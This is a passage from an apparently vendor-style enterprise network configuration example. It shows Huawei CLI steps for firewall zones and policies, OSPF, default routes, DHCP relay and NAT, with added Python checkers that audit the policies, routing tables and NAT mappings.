[AGG2-Eth-Trunk600] port hybrid pvid vlan 600
[AGG2-Eth-Trunk600] port hybrid untagged vlan 600
[AGG2-Eth-Trunk600] quit
[AGG2] interface vlanif 600
[AGG2-Vlanif600] ip address 192.168.2.1 24 //Configure an IP address for the
interface connected to the access switch and configure it as the gateway address
of department B.
[AGG2-Vlanif600] quit

Step 5 On the firewalls, assign interfaces to security zones and configure interzone security policies.
# Add interfaces to zones.
[FW1] firewall zone trust
[FW1-zone-trust] add interface Eth-Trunk 10 //Add Eth-Trunk 10 connected to the
internal network to a trusted zone.
[FW1-zone-trust] quit
[FW1] firewall zone untrust
[FW1-zone-untrust] add interface gigabitethernet 1/0/1 //Add GE1/0/1 connected
to the external network to an untrusted zone.
[FW1-zone-untrust] quit
[FW1] firewall zone dmz
[FW1-zone-dmz] add interface gigabitethernet 1/0/7 //Add GE1/0/7 to the DMZ.
[FW1-zone-dmz] quit
[FW2] firewall zone trust
[FW2-zone-trust] add interface Eth-Trunk 20 //Add Eth-Trunk 20 connected to the
internal network to a trusted zone.
[FW2-zone-trust] quit
[FW2] firewall zone untrust
[FW2-zone-untrust] add interface gigabitethernet 1/0/1 //Add GE1/0/1 connected
to the external network to an untrusted zone.
[FW2-zone-untrust] quit
[FW2] firewall zone dmz
[FW2-zone-dmz] add interface gigabitethernet 1/0/7 //Add GE1/0/7 to the DMZ.
[FW2-zone-dmz] quit

# Configure security policies on FW1.
[FW1] policy interzone local untrust inbound
[FW1-policy-interzone-local-untrust-inbound] policy 2
[FW1-policy-interzone-local-untrust-inbound-2] policy source 10.1.1.1 mask 24 //Permit the router in the untrusted zone to access the firewall. Note that mask 24 matches the whole 10.1.1.0/24 segment, not only Router1; use mask 32 if only the router's own address should be permitted.
[FW1-policy-interzone-local-untrust-inbound-2] action permit
[FW1-policy-interzone-local-untrust-inbound-2] quit
[FW1-policy-interzone-local-untrust-inbound] quit
[FW1] policy interzone local trust outbound
[FW1-policy-interzone-local-trust-outbound] policy 1
[FW1-policy-interzone-local-trust-outbound-1] policy source 10.3.1.2 mask 24 //Permit the CSS segment in the trusted zone to reach the firewall.
[FW1-policy-interzone-local-trust-outbound-1] policy source 10.5.1.1 mask 24 //Add the AGG1 uplink segment to the same rule.
[FW1-policy-interzone-local-trust-outbound-1] policy source 192.168.1.1 mask 24 //Add the department A user segment to the same rule.
[FW1-policy-interzone-local-trust-outbound-1] action permit
[FW1-policy-interzone-local-trust-outbound-1] quit
[FW1-policy-interzone-local-trust-outbound] quit
[FW1] policy interzone trust untrust outbound
[FW1-policy-interzone-trust-untrust-outbound] policy 4

[FW1-policy-interzone-trust-untrust-outbound-4] policy source 192.168.1.1 mask 24 //Permit the department A segment 192.168.1.0/24 to access the external network.
[FW1-policy-interzone-trust-untrust-outbound-4] action permit
[FW1-policy-interzone-trust-untrust-outbound-4] quit
[FW1-policy-interzone-trust-untrust-outbound] quit
[FW1] policy interzone trust untrust inbound
[FW1-policy-interzone-trust-untrust-inbound] policy 3
[FW1-policy-interzone-trust-untrust-inbound-3] policy source 10.1.1.1 mask 24 //Permit the segment 10.1.1.0/24 on the Router1 side to access the internal network (mask 24 covers the whole segment, not only 10.1.1.1).
[FW1-policy-interzone-trust-untrust-inbound-3] action permit
[FW1-policy-interzone-trust-untrust-inbound-3] quit
[FW1-policy-interzone-trust-untrust-inbound] quit

# Configure security policies on FW2.
[FW2] policy interzone local untrust inbound
[FW2-policy-interzone-local-untrust-inbound] policy 2
[FW2-policy-interzone-local-untrust-inbound-2] policy source 10.2.1.1 mask 24 //Permit the router in the untrusted zone to access the firewall (mask 24 covers the whole 10.2.1.0/24 segment).
[FW2-policy-interzone-local-untrust-inbound-2] action permit
[FW2-policy-interzone-local-untrust-inbound-2] quit
[FW2-policy-interzone-local-untrust-inbound] quit
[FW2] policy interzone local trust outbound
[FW2-policy-interzone-local-trust-outbound] policy 1
[FW2-policy-interzone-local-trust-outbound-1] policy source 10.4.1.2 mask 24 //Permit the CSS segment in the trusted zone to reach the firewall.
[FW2-policy-interzone-local-trust-outbound-1] policy source 10.6.1.1 mask 24 //Add the AGG2 uplink segment to the same rule.
[FW2-policy-interzone-local-trust-outbound-1] policy source 192.168.2.1 mask 24 //Add the department B user segment to the same rule.
[FW2-policy-interzone-local-trust-outbound-1] action permit
[FW2-policy-interzone-local-trust-outbound-1] quit
[FW2-policy-interzone-local-trust-outbound] quit
[FW2] policy interzone trust untrust inbound
[FW2-policy-interzone-trust-untrust-inbound] policy 3
[FW2-policy-interzone-trust-untrust-inbound-3] policy source 10.2.1.1 mask 24 //Permit the segment 10.2.1.0/24 on the Router2 side to access the internal network (mask 24 covers the whole segment, not only 10.2.1.1).
[FW2-policy-interzone-trust-untrust-inbound-3] action permit
[FW2-policy-interzone-trust-untrust-inbound-3] quit
[FW2-policy-interzone-trust-untrust-inbound] quit
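The zone and policy configuration above can be checked offline before it is pushed to the firewalls. The following Python model is an added example and is not Huawei code: it transcribes FW1's zone membership and the three interzone policies whose direction follows directly from the commands (local/untrust inbound, trust/untrust outbound and trust/untrust inbound), assumes the default USG zone priorities (local 100, trust 85, dmz 50, untrust 5, with "inbound" meaning from the lower-priority zone to the higher one) and a constructed FW1 route table, and evaluates constructed packets. It shows that `policy source 10.1.1.1 mask 24` admits every host in 10.1.1.0/24, not only Router1, and contrasts it with a host-scoped (mask 32) variant.

```python
"""Added example (not Huawei code): evaluator for the FW1 interzone policies
configured in Step 5. Zones, addresses and rule numbers are from the page; the
USG default zone priorities are assumed; the route table and test packets are
constructed.
"""
from dataclasses import dataclass
from ipaddress import IPv4Network, ip_address, ip_network

# Default USG zone priorities; "inbound" is from the lower- to the higher-priority zone.
ZONE_PRIORITY = {"local": 100, "trust": 85, "dmz": 50, "untrust": 5}

# FW1 interfaces as configured in Steps 4 and 5: name -> (zone, own address).
FW1_INTERFACES = {
    "Eth-Trunk10": ("trust", ip_address("10.3.1.1")),
    "GigabitEthernet1/0/1": ("untrust", ip_address("10.1.1.2")),
    "GigabitEthernet1/0/7": ("dmz", ip_address("10.10.1.1")),
}

# Constructed FW1 route table: connected, OSPF-learned and the static default.
FW1_ROUTES = [
    (ip_network("10.3.1.0/24"), "Eth-Trunk10"),
    (ip_network("10.5.1.0/24"), "Eth-Trunk10"),
    (ip_network("192.168.1.0/24"), "Eth-Trunk10"),
    (ip_network("10.1.1.0/24"), "GigabitEthernet1/0/1"),
    (ip_network("10.10.1.0/24"), "GigabitEthernet1/0/7"),
    (ip_network("0.0.0.0/0"), "GigabitEthernet1/0/1"),
]


@dataclass(frozen=True)
class Rule:
    number: int
    source: IPv4Network   # built from `policy source <addr> mask <len>`
    action: str


def policy_source(addr: str, masklen: int) -> IPv4Network:
    """`policy source 10.1.1.1 mask 24` matches 10.1.1.0/24, not the single host."""
    return ip_network(f"{addr}/{masklen}", strict=False)


# (higher-priority zone, lower-priority zone, direction) -> rules, as configured on FW1.
FW1_POLICIES = {
    ("local", "untrust", "inbound"): [Rule(2, policy_source("10.1.1.1", 24), "permit")],
    ("trust", "untrust", "outbound"): [Rule(4, policy_source("192.168.1.1", 24), "permit")],
    ("trust", "untrust", "inbound"): [Rule(3, policy_source("10.1.1.1", 24), "permit")],
}

# Hardened variant: the router rules scoped to Router1's address only.
FW1_POLICIES_HOST = dict(FW1_POLICIES)
FW1_POLICIES_HOST[("local", "untrust", "inbound")] = [Rule(2, policy_source("10.1.1.1", 32), "permit")]
FW1_POLICIES_HOST[("trust", "untrust", "inbound")] = [Rule(3, policy_source("10.1.1.1", 32), "permit")]


def egress_interface(dst, routes=FW1_ROUTES):
    """Longest-prefix match over (network, interface) tuples."""
    return max((r for r in routes if dst in r[0]), key=lambda r: r[0].prefixlen)[1]


def evaluate(src_ip, in_interface, dst_ip, policies=FW1_POLICIES):
    """Return (action, rule number) for a packet arriving on in_interface."""
    src, dst = ip_address(src_ip), ip_address(dst_ip)
    from_zone = FW1_INTERFACES[in_interface][0]
    if any(dst == addr for _, addr in FW1_INTERFACES.values()):
        to_zone = "local"                       # addressed to the firewall itself
    else:
        to_zone = FW1_INTERFACES[egress_interface(dst)][0]
    if from_zone == to_zone:
        return ("permit", None)                 # intra-zone traffic is not filtered here
    high, low = sorted((from_zone, to_zone), key=lambda z: -ZONE_PRIORITY[z])
    direction = "inbound" if from_zone == low else "outbound"
    for rule in sorted(policies.get((high, low, direction), []), key=lambda r: r.number):
        if src in rule.source:
            return (rule.action, rule.number)
    return ("deny", None)                       # default interzone action


if __name__ == "__main__":
    # Constructed packets: (source, ingress interface, destination).
    for pkt in [("10.1.1.1", "GigabitEthernet1/0/1", "10.3.1.1"),
                ("10.1.1.99", "GigabitEthernet1/0/1", "192.168.1.50"),
                ("192.168.1.50", "Eth-Trunk10", "8.8.8.8"),
                ("192.168.2.50", "Eth-Trunk10", "8.8.8.8")]:
        print(pkt, "configured:", evaluate(*pkt), "host-scoped:", evaluate(*pkt, FW1_POLICIES_HOST))
```

Run as a script, the model reports that 10.1.1.99 (any host on the Router1 link) is permitted into the trusted zone by policy 3 as configured, but denied by the host-scoped variant, and that department B traffic (192.168.2.0/24) is denied by FW1 because only FW2 permits it.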

Step 6 Deploy routing.
1. Configure OSPF area 0 on uplink interfaces of routers, firewalls, and core switches.
# Configure Router1.
[Router1] router id 1.1.1.1
[Router1] ospf 1 //Configure OSPF.
[Router1-ospf-1] area 0 //Configure a backbone area.
[Router1-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255 //Configure the
device to advertise the network segment connected to FW1 to the OSPF backbone
area.
[Router1-ospf-1-area-0.0.0.0] quit
[Router1-ospf-1] quit

# Configure Router2.
[Router2] router id 2.2.2.2
[Router2] ospf 1 //Configure OSPF.
[Router2-ospf-1] area 0 //Configure a backbone area.
[Router2-ospf-1-area-0.0.0.0] network 10.2.1.0 0.0.0.255 //Configure the
device to advertise the network segment connected to FW2 to the OSPF backbone
area.
[Router2-ospf-1-area-0.0.0.0] quit
[Router2-ospf-1] quit

# Configure FW1.
[FW1] router id 3.3.3.3
[FW1] ospf 1 //Configure OSPF.
[FW1-ospf-1] area 0 //Configure a backbone area.
[FW1-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255 //Configure the device
to advertise the network segment connected to Router1 to the OSPF backbone
area.
[FW1-ospf-1-area-0.0.0.0] network 10.3.1.0 0.0.0.255 //Configure the device
to advertise the network segment connected to the CSS to the OSPF backbone
area.
[FW1-ospf-1-area-0.0.0.0] quit
[FW1-ospf-1] quit

# Configure FW2.
[FW2] router id 4.4.4.4
[FW2] ospf 1 //Configure OSPF.
[FW2-ospf-1] area 0 //Configure a backbone area.
[FW2-ospf-1-area-0.0.0.0] network 10.2.1.0 0.0.0.255 //Configure the device to advertise the network segment connected to Router2 to the OSPF backbone area.
[FW2-ospf-1-area-0.0.0.0] network 10.4.1.0 0.0.0.255 //Configure the device
to advertise the network segment connected to the CSS to the OSPF backbone
area.
[FW2-ospf-1-area-0.0.0.0] quit
[FW2-ospf-1] quit

# Configure the CSS.
[CSS] router id 5.5.5.5
[CSS] ospf 1 //Configure OSPF.
[CSS-ospf-1] area 0 //Configure a backbone area.
[CSS-ospf-1-area-0.0.0.0] network 10.3.1.0 0.0.0.255 //Configure the device
to advertise the network segment connected to FW1 to the OSPF backbone area.
[CSS-ospf-1-area-0.0.0.0] network 10.4.1.0 0.0.0.255 //Configure the device
to advertise the network segment connected to FW2 to the OSPF backbone area.
[CSS-ospf-1-area-0.0.0.0] network 10.100.1.0 0.0.0.255 //Configure the
device to advertise the network segment connected to the HTTP server to the
OSPF backbone area.
[CSS-ospf-1-area-0.0.0.0] quit
[CSS-ospf-1] quit
2. Configure OSPF areas 1 and 2 on core and aggregation switches, configure the two
OSPF areas as NSSAs, and add downlink interfaces of core switches to NSSAs.
# Configure the CSS.
[CSS] ospf 1 //Configure OSPF.
[CSS-ospf-1] area 1 //Configure OSPF area 1.
[CSS-ospf-1-area-0.0.0.1] network 10.5.1.0 0.0.0.255 //Configure the device
to advertise the network segment connected to AGG1 to OSPF area 1.
[CSS-ospf-1-area-0.0.0.1] nssa //Configure OSPF area 1 as an NSSA.
[CSS-ospf-1-area-0.0.0.1] quit
[CSS-ospf-1] area 2 //Configure OSPF area 2.
[CSS-ospf-1-area-0.0.0.2] network 10.6.1.0 0.0.0.255 //Configure the device
to advertise the network segment connected to AGG2 to OSPF area 2.
[CSS-ospf-1-area-0.0.0.2] nssa //Configure OSPF area 2 as an NSSA.
[CSS-ospf-1-area-0.0.0.2] quit
[CSS-ospf-1] quit

# Configure AGG1.
[AGG1] ospf 1 //Configure OSPF.
[AGG1-ospf-1] area 1 //Configure OSPF area 1.
[AGG1-ospf-1-area-0.0.0.1] network 10.5.1.0 0.0.0.255 //Configure the
device to advertise the network segment connected to the CSS to OSPF area 1.
[AGG1-ospf-1-area-0.0.0.1] network 192.168.1.0 0.0.0.255 //Configure the
device to advertise the user network segment to OSPF area 1.
[AGG1-ospf-1-area-0.0.0.1] nssa //Configure OSPF area 1 as an NSSA.
[AGG1-ospf-1-area-0.0.0.1] quit
[AGG1-ospf-1] quit

# Configure AGG2.

[AGG2] ospf 1 //Configure OSPF.
[AGG2-ospf-1] area 2 //Configure OSPF area 2.
[AGG2-ospf-1-area-0.0.0.2] network 10.6.1.0 0.0.0.255 //Configure the
device to advertise the network segment connected to the CSS to OSPF area 2.
[AGG2-ospf-1-area-0.0.0.2] network 192.168.2.0 0.0.0.255 //Configure the device to advertise the user network segment to OSPF area 2.
[AGG2-ospf-1-area-0.0.0.2] nssa //Configure OSPF area 2 as an NSSA.
[AGG2-ospf-1-area-0.0.0.2] quit
[AGG2-ospf-1] quit

3. Configure default routes: on the core switch, two default routes pointing to the firewalls; on each firewall, a default route pointing to its egress router; and on each egress router, a default route pointing to the address of the interconnected interface (public gateway address) of the carrier's device.
[Router1] ip route-static 0.0.0.0 0.0.0.0 202.10.1.2
[Router2] ip route-static 0.0.0.0 0.0.0.0 202.10.2.2
[FW1] ip route-static 0.0.0.0 0.0.0.0 10.1.1.1
[FW2] ip route-static 0.0.0.0 0.0.0.0 10.2.1.1
[CSS] ip route-static 0.0.0.0 0.0.0.0 10.3.1.1
[CSS] ip route-static 0.0.0.0 0.0.0.0 10.4.1.1

4. Verify the configuration.
Check the routing table on an aggregation stack. AGG1 is used as an example. Routes exist for the internal network segments, and a single default route (O_NSSA) points out of the NSSA towards the CSS.
[AGG1] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 14 Routes : 14

Destination/Mask Proto Pre Cost Flags NextHop Interface

0.0.0.0/0 O_NSSA 150 1 D 10.5.1.1 Vlanif100
6.6.6.6/32 Direct 0 0 D 127.0.0.1 LoopBack0
10.1.1.0/24 OSPF 10 3 D 10.5.1.1 Vlanif100
10.2.1.0/24 OSPF 10 3 D 10.5.1.1 Vlanif100
10.3.1.0/24 OSPF 10 2 D 10.5.1.1 Vlanif100
10.4.1.0/24 OSPF 10 2 D 10.5.1.1 Vlanif100
10.5.1.0/24 Direct 0 0 D 10.5.1.2 Vlanif100
10.5.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif100
10.6.1.0/24 OSPF 10 2 D 10.5.1.1 Vlanif100
127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
192.168.1.0/24 Direct 0 0 D 192.168.1.1 Vlanif500
192.168.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif500
192.168.2.0/24 OSPF 10 3 D 10.5.1.1 Vlanif100
# Check the routing table in the CSS. Routes exist for the internal network segments, and the two static default routes via FW1 and FW2 have the same preference and cost, so the CSS load-balances outbound traffic across both firewalls.
[CSS] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 18 Routes : 19

Destination/Mask Proto Pre Cost Flags NextHop Interface

0.0.0.0/0 Static 60 0 RD 10.3.1.1 Eth-Trunk10
Static 60 0 RD 10.4.1.1 Eth-Trunk20
5.5.5.5/32 Direct 0 0 D 127.0.0.1 LoopBack0
10.1.1.0/24 OSPF 10 2 D 10.3.1.1 Eth-Trunk10
10.2.1.0/24 OSPF 10 2 D 10.4.1.1 Eth-Trunk20
10.3.1.0/24 Direct 0 0 D 10.3.1.2 Eth-Trunk10
10.3.1.2/32 Direct 0 0 D 127.0.0.1 Eth-Trunk10

10.4.1.0/24 Direct 0 0 D 10.4.1.2 Eth-Trunk20
10.4.1.2/32 Direct 0 0 D 127.0.0.1 Eth-Trunk20
10.5.1.0/24 Direct 0 0 D 10.5.1.1 Vlanif100
10.5.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif100
10.6.1.0/24 Direct 0 0 D 10.6.1.1 Vlanif200
10.6.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif200
10.100.1.0/24 Direct 0 0 D 10.100.1.1 Vlanif300
10.100.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif300
127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
192.168.1.0/24 OSPF 10 2 D 10.5.1.2 Vlanif100
192.168.2.0/24 OSPF 10 2 D 10.6.1.2 Vlanif200
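The two routing-table checks above are easy to do by eye once, but worth scripting when the same topology is redeployed or audited. The following Python parser is an added example and is not Huawei code: it reads the VRP `display ip routing-table` format shown above, including the continuation row that an equal-cost default route produces, and encodes the two expectations stated in the text, namely that AGG1 has exactly one default route learned as O_NSSA and that the CSS has two equal-cost static defaults, one per firewall. The embedded samples are trimmed copies of the output shown above.

```python
"""Added example (not Huawei code): checks over VRP `display ip routing-table`
output. The two samples are trimmed copies of the AGG1 and CSS output shown in
this step; the checks encode what the text says that output should show.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Route:
    destination: str
    proto: str
    pre: int
    cost: int
    flags: str
    next_hop: str
    interface: str


def parse_routing_table(text):
    """Return {destination: [Route, ...]}; ECMP continuation rows omit the destination."""
    table = defaultdict(list)
    current = None
    in_rows = False
    for line in text.splitlines():
        fields = line.split()
        if not in_rows:
            in_rows = fields[:1] == ["Destination/Mask"]   # skip the banner lines
            continue
        if len(fields) == 7 and "/" in fields[0]:
            current = fields[0]                              # new destination
            fields = fields[1:]
        elif len(fields) == 6 and current is not None:
            pass                                             # continuation row: same destination
        else:
            continue                                         # blank or separator line
        proto, pre, cost, flags, nh, iface = fields
        table[current].append(Route(current, proto, int(pre), int(cost), flags, nh, iface))
    return dict(table)


def nssa_default_only(table):
    """True if the only default route is the one injected by the NSSA ABR (O_NSSA)."""
    defaults = table.get("0.0.0.0/0", [])
    return len(defaults) == 1 and defaults[0].proto == "O_NSSA"


def ecmp_next_hops(table, destination):
    """Next hops sharing the lowest (preference, cost) for a destination."""
    routes = table.get(destination, [])
    if not routes:
        return set()
    best = min((r.pre, r.cost) for r in routes)
    return {r.next_hop for r in routes if (r.pre, r.cost) == best}


def routes_via(table, next_hop):
    """Destinations reachable through a given next hop, sorted."""
    return sorted(d for d, rs in table.items() if any(r.next_hop == next_hop for r in rs))


AGG1_OUTPUT = """\
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
         Destinations : 14        Routes : 14

Destination/Mask    Proto   Pre  Cost      Flags NextHop         Interface

        0.0.0.0/0   O_NSSA  150  1           D   10.5.1.1        Vlanif100
        6.6.6.6/32  Direct  0    0           D   127.0.0.1       LoopBack0
       10.1.1.0/24  OSPF    10   3           D   10.5.1.1        Vlanif100
       10.5.1.0/24  Direct  0    0           D   10.5.1.2        Vlanif100
    192.168.1.0/24  Direct  0    0           D   192.168.1.1     Vlanif500
    192.168.2.0/24  OSPF    10   3           D   10.5.1.1        Vlanif100
"""

CSS_OUTPUT = """\
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
         Destinations : 18        Routes : 19

Destination/Mask    Proto   Pre  Cost      Flags NextHop         Interface

        0.0.0.0/0   Static  60   0          RD   10.3.1.1        Eth-Trunk10
                    Static  60   0          RD   10.4.1.1        Eth-Trunk20
       10.1.1.0/24  OSPF    10   2           D   10.3.1.1        Eth-Trunk10
       10.2.1.0/24  OSPF    10   2           D   10.4.1.1        Eth-Trunk20
    192.168.1.0/24  OSPF    10   2           D   10.5.1.2        Vlanif100
    192.168.2.0/24  OSPF    10   2           D   10.6.1.2        Vlanif200
"""

if __name__ == "__main__":
    agg1 = parse_routing_table(AGG1_OUTPUT)
    css = parse_routing_table(CSS_OUTPUT)
    print("AGG1 default is the NSSA default:", nssa_default_only(agg1))
    print("CSS default next hops:", sorted(ecmp_next_hops(css, "0.0.0.0/0")))
```

The parser deliberately ignores everything before the `Destination/Mask` header, so it also copes with the `Destinations : N Routes : M` summary line, and it keys on the column count to tell a continuation row (six fields) from a new destination (seven fields with a slash in the first).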

Step 7 Configure DHCP in the CSS and stack.
# Configure the DHCP server in the CSS to allocate IP addresses to users.
[CSS] dhcp enable //Enable DHCP.
[CSS] interface vlanif 100 //Configure the device to allocate IP addresses to
department A through VLANIF 100.
[CSS-Vlanif100] dhcp select global //Configure the device to use the global
address pool.
[CSS-Vlanif100] quit
[CSS] interface vlanif 200 //Configure the device to allocate IP addresses to department B through VLANIF 200.
[CSS-Vlanif200] dhcp select global //Configure the device to use the global
address pool.
[CSS-Vlanif200] quit
[CSS] ip pool poola //Configure the address pool poola from which IP addresses
are allocated to department A.
[CSS-ip-pool-poola] network 192.168.1.0 mask 24 //Configure a network segment
assigned to department A.
[CSS-ip-pool-poola] gateway-list 192.168.1.1 //Configure a gateway address for
department A.
[CSS-ip-pool-poola] quit
[CSS] ip pool poolb //Configure the address pool poolb from which IP addresses
are allocated to department B.
[CSS-ip-pool-poolb] network 192.168.2.0 mask 24 //Configure a network segment
assigned to department B.
[CSS-ip-pool-poolb] gateway-list 192.168.2.1 //Configure a gateway address for
department B.
[CSS-ip-pool-poolb] quit

# Configure the DHCP relay function on AGG1.
[AGG1] dhcp enable //Enable DHCP.
[AGG1] interface vlanif 500
[AGG1-Vlanif500] dhcp select relay //Configure the DHCP relay function.
[AGG1-Vlanif500] dhcp relay server-ip 10.5.1.1 //Specify the DHCP server's IP
address.
[AGG1-Vlanif500] quit

# Configure the DHCP relay function on AGG2.
[AGG2] dhcp enable //Enable DHCP.
[AGG2] interface vlanif 600
[AGG2-Vlanif600] dhcp select relay //Configure the DHCP relay function.
[AGG2-Vlanif600] dhcp relay server-ip 10.6.1.1 //Specify the DHCP server's IP
address.
[AGG2-Vlanif600] quit

# Verify the configuration.
Configure clients to obtain IP addresses through the DHCP server and check the address pool
in the CSS. You can see that two IP addresses (Used: 2) have been allocated and there are 503
remaining IP addresses (Idle: 503). That is, IP addresses are allocated successfully.
[CSS] display ip pool
-----------------------------------------------------------------------
Pool-name : poola
Pool-No : 0
Position : Local Status : Unlocked

Gateway-0 : 192.168.1.1
Mask : 255.255.255.0
VPN instance : --

-----------------------------------------------------------------------
Pool-name : poolb
Pool-No : 1
Position : Local Status : Unlocked
Gateway-0 : 192.168.2.1
Mask : 255.255.255.0
VPN instance : --

IP address Statistic
Total :506
Used :2 Idle :503
Expired :0 Conflict :1 Disable :0

Step 8 Configure NAT on egress routers.
Users on the internal network use private IP addresses. To meet the requirements, perform
NAT configurations:
l To allow users of department A to access the Internet, configure NAT on egress routers
to translate private IP addresses into public IP addresses.
l To allow users on the external network to access the HTTP server, configure the NAT
server on egress routers.
NOTE

Assume that the carrier allocates the following public IP addresses to the enterprise: 202.10.1.2 to 202.10.1.10 and 202.10.2.2 to 202.10.2.10. The addresses 202.10.1.2 and 202.10.2.2 are used by Router1 and Router2 respectively to connect to the external network. The address 202.10.1.10 is used by users on the external network to access the HTTP server. Users on the internal network use the remaining public IP addresses to access the Internet.

# Configure NAT on Router1 to translate IP addresses of users in department A into public IP addresses so that users in department A can access the Internet.
[Router1] nat address-group 1 202.10.1.3 202.10.1.9 //Configure a NAT address
pool, including public IP addresses allocated by the carrier.
[Router1] acl number 2000
[Router1-acl-basic-2000] rule permit source 192.168.1.0 0.0.0.255 //Define the internal address segment that is allowed to access the external network.
[Router1-acl-basic-2000] quit
[Router1] interface gigabitethernet 0/0/2
[Router1-GigabitEthernet0/0/2] nat outbound 2000 address-group 1 //Configure
NAT on the interface connected to the external network.
[Router1-GigabitEthernet0/0/2] quit

# Configure NAT on Router2 to translate IP addresses of users in department A into public IP addresses.
[Router2] nat address-group 1 202.10.2.3 202.10.2.10 //Configure a NAT address pool, including public IP addresses allocated by the carrier.
[Router2] acl number 2000
[Router2-acl-basic-2000] rule permit source 192.168.1.0 0.0.0.255 //Define the internal address segment that is allowed to access the external network.
[Router2-acl-basic-2000] quit
[Router2] interface gigabitethernet 0/0/2
[Router2-GigabitEthernet0/0/2] nat outbound 2000 address-group 1 //Configure
NAT on the interface connected to the external network.
[Router2-GigabitEthernet0/0/2] quit
# Verify the configuration.
[Router2] display nat outbound
NAT Outbound Information:

-------------------------------------------------------------------------
Interface Acl Address-group/IP/Interface Type
-------------------------------------------------------------------------
GigabitEthernet0/0/2 2000 1 pat
-------------------------------------------------------------------------
Total : 1

# Configure the NAT server on Router1 and Router2 so that users on the external network can
access the HTTP server.
[Router1] interface gigabitethernet 0/0/2
[Router1-GigabitEthernet0/0/2] nat server protocol tcp global 202.10.1.10 http
inside 10.100.1.1 http //Configure the device to allow Internet users to access
the HTTP server of the company.
[Router1-GigabitEthernet0/0/2] quit
[Router2] interface gigabitethernet 0/0/2
[Router2-GigabitEthernet0/0/2] nat server protocol tcp global 202.10.1.10 http
inside 10.100.1.1 http //Configure the device to allow Internet users to access
the HTTP server of the company.
[Router2-GigabitEthernet0/0/2] quit
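To see what the NAT lines above actually translate and what the `nat server` mapping exposes, the following added evaluator (example code, not Huawei's) parses the ACL, address pool, `nat outbound` and `nat server` entries in the form used in this step; the config text is constructed from the Router1 configuration file at the end of this example, and the service-keyword table is an assumption.

```python
"""Evaluator for the VRP-style NAT lines used in this step (added example)."""
import ipaddress
import re

# Constructed from the Router1 configuration file at the end of this example.
ROUTER1_NAT_CONFIG = """\
acl number 2000
 rule permit source 192.168.1.0 0.0.0.255
#
nat address-group 1 202.10.1.3 202.10.1.9
#
interface GigabitEthernet 0/0/2
 nat outbound 2000 address-group 1
 nat server protocol tcp global 202.10.1.10 http inside 10.100.1.10 http
"""

# Assumed subset of the service keywords 'nat server' accepts instead of a port.
SERVICE_PORTS = {"http": 80, "https": 443, "ftp": 21, "ssh": 22, "telnet": 23}


def _port(token):
    return int(token) if token.isdigit() else SERVICE_PORTS[token]


def _ifname(name):
    # "gigabitethernet 0/0/2" and "GigabitEthernet0/0/2" denote the same port.
    return name.replace(" ", "").lower()


def wildcard_to_network(addr, wildcard):
    """VRP ACLs use a wildcard mask: a 0 bit must match, a 1 bit is ignored.
    Converting to a netmask first keeps ipaddress from guessing: 0.0.0.0 is a
    single-host match, not 'any', and 255.255.255.255 is 'any', not a /32."""
    w = int(ipaddress.ip_address(wildcard))
    netmask = ipaddress.ip_address(~w & 0xFFFFFFFF)
    return ipaddress.ip_network(f"{addr}/{netmask}", strict=False)


def parse_nat_config(text):
    """Parse ACL rules, NAT address pools, 'nat outbound' and 'nat server' lines."""
    cfg = {"acls": {}, "groups": {}, "outbound": [], "servers": []}
    acl = iface = None
    for raw in text.splitlines():
        line = raw.strip()
        if m := re.fullmatch(r"acl number (\d+)", line):
            acl, iface = int(m.group(1)), None
            cfg["acls"].setdefault(acl, [])
        elif m := re.fullmatch(r"rule (?:\d+ )?(permit|deny) source (\S+) (\S+)", line):
            cfg["acls"][acl].append(
                (m.group(1), wildcard_to_network(m.group(2), m.group(3))))
        elif m := re.fullmatch(r"nat address-group (\d+) (\S+) (\S+)(?: mask \S+)?", line):
            cfg["groups"][int(m.group(1))] = (m.group(2), m.group(3))
        elif m := re.fullmatch(r"interface (.+)", line):
            iface, acl = _ifname(m.group(1)), None
        elif m := re.fullmatch(r"nat outbound (\d+) address-group (\d+)", line):
            cfg["outbound"].append((iface, int(m.group(1)), int(m.group(2))))
        elif m := re.fullmatch(
                r"nat server protocol (\w+) global (\S+) (\S+) inside (\S+) (\S+)", line):
            cfg["servers"].append((iface, m.group(1), m.group(2), _port(m.group(3)),
                                   m.group(4), _port(m.group(5))))
    return cfg


def outbound_pool(cfg, src_ip, egress_if):
    """Public address range used to source-NAT src_ip when it leaves egress_if,
    or None when no permit rule matches (the packet then leaves untranslated)."""
    src = ipaddress.ip_address(src_ip)
    for iface, acl_id, group_id in cfg["outbound"]:
        if iface != _ifname(egress_if):
            continue
        for action, net in cfg["acls"].get(acl_id, []):
            if src in net:  # the first matching rule decides
                return cfg["groups"][group_id] if action == "permit" else None
    return None


def inbound_target(cfg, proto, dst_ip, dst_port):
    """(inside_ip, inside_port) for an Internet flow admitted by a 'nat server'
    mapping; None means the flow has no static mapping and is not forwarded in."""
    for _iface, p, g_ip, g_port, i_ip, i_port in cfg["servers"]:
        if p == proto and g_ip == dst_ip and g_port == dst_port:
            return (i_ip, i_port)
    return None


def exposed_services(cfg):
    """The (proto, global_ip, global_port) triples reachable from the Internet:
    the list a reviewer checks against the intended published services."""
    return sorted((p, g, gp) for _i, p, g, gp, _ii, _ip in cfg["servers"])


if __name__ == "__main__":
    cfg = parse_nat_config(ROUTER1_NAT_CONFIG)
    print("department A host ->", outbound_pool(cfg, "192.168.1.25", "GigabitEthernet 0/0/2"))
    print("server segment    ->", outbound_pool(cfg, "10.100.1.10", "GigabitEthernet 0/0/2"))
    print("exposed:", exposed_services(cfg))
```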

Step 9 Configure HRP on firewalls.

